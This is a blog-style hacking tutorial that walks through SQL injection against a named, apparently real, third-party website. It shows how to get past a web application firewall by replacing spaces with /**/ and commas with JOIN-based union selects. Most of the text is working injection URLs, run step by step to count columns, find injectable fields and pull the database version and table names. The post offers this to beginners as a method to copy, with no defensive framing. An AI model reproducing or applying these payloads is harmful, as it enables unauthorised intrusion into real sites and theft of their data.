11.16
Unknown
HI Today we will learn how to bypass white spaces and commas if it is blocked by Waf.
Lets start
Code::
http://bluegrassmidwest.com/details.php?id=18
when i put ' it generates a error message which very good for injectore
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ''18''' at line 1
This error generate due to dismatch of query.
now when i tried to fix query it generates different error ...
http://bluegrassmidwest.com/details.php?id=18' %23
ERROR::
Warning: Cookie names cannot contain any of the following '=,; \t\r\n\013\014' in /home/bgmidwest/domains/bluegrassmidwest.com/public_html/details.php
on line 8 error setting cookie
i tried with null bytes , --+ etc it generates same error...
now when i remove white spaces it worked !!!
White spaces by pass with /**/....
http://bluegrassmidwest.com/details.php?id=18'/**/%23 Query fix
Now After that i tried to find columns using by order by..
http://bluegrassmidwest.com/details.php?id=18'/**/order by 1%23
Error Again,,,Due to white spaces::
Error Gone !!
http://bluegrassmidwest.com/details.php?id=18'/**/order/**/by/**/1%23
At 12 columns it generated error message unkown column is 12.
It means it has 11 columns
Now try to find vulnerable column. For that purpose we will use Union select
http://bluegrassmidwest.com/details.php?id=18'/**/order/**/by/**/1%23
Vlunerable columns finding ::
http://bluegrassmidwest.com/details.php?id=18'/**/uNIon/**_**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11%23
But it generate same error !!
it means something wrong with commas.
lets try to bypass Comma :::
Here are the three methods which i know and mostly use to bypass [,] COMMA
1) union select 1/*!,*/ 2/*!,*/3
2) union select 1,CHAR(44), 2,CHAR(44),3,char(44)
3)(select 1)a join (select 2)b join (select 3)c
So we will use 3 option that is called joining.
PHP CODE::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/2)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
now it will show us vlunerable columns. 2 3 4 7 10 columns are vluberable.
HoW Can WE Perform Dios ??
For this we will use separator.
First of all we put our Leet name in 2
inject by Faryabi =0x696e6a6563742062792046617279616269(hexa)
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/3)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
Now version::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/group_concat(version()/**/separator/**/0x203a3a207e7472306a416e2a203a3a)c/**/join/**/(select/**/4)d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
now Tables ::
http://bluegrassmidwest.com/details.php?id=-18%27union/**/select/**/*/**/from/**/(select/**/1)a/**/join/**/(select/**/0x696e6a6563742062792046617279616269)b/**/join/**/(select/**/group_concat(version()/**/separator/**/0x203a3a207e7472306a416e2a203a3a))c/**/join/**/(select/**/(select(group_concat(table_name/**/separator/**/0x3c62723e))/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()))d/**/join/**/(select/**/5)e/**/join/**/(select/**/6)f/**/join/**/(select/**/7)g/**/join/**/(select/**/8)h/**/join/**/(select/**/9)i/**/join/**/(select/**/10)j/**/join/**/(select/**/11)k%23
I hope u got something ...Sepcially noobs like me ...
thax For reading.
Posted in
0 komentar:
Posting Komentar